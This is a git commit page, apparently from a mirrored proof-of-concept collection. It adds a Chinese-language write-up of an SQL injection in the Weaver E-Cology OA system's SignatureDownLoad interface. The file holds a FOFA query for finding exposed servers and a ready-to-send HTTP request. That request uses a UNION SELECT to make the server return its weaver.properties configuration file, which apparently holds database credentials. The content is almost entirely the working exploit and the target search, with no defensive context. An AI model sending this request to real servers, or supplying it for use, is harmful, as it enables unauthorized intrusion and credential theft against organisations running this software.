mirror of
https://github.com/wooluo/POC00.git
synced 2026-03-17 20:24:57 +08:00
Create 泛微E-Cology系统接口SignatureDownLoad存在SQL注入漏洞.md
This commit is contained in:
parent
dd8c6820db
commit
1c4146c7fa
18
泛微E-Cology系统接口SignatureDownLoad存在SQL注入漏洞.md
Normal file
18
泛微E-Cology系统接口SignatureDownLoad存在SQL注入漏洞.md
Normal file
@ -0,0 +1,18 @@
|
|||||||
|
## 泛微E-Cology系统接口SignatureDownLoad存在SQL注入漏洞
|
||||||
|
|
||||||
|
## fofa
|
||||||
|
```
|
||||||
|
app="泛微-OA(e-cology)"
|
||||||
|
```
|
||||||
|
|
||||||
|
## poc
|
||||||
|
```
|
||||||
|
GET /weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27../ecology/WEB-INF/prop/weaver.properties%27 HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Connection: close
|
||||||
|
```
|
||||||
|
|
||||||
|

|
||||||
Loading…
x
Reference in New Issue
Block a user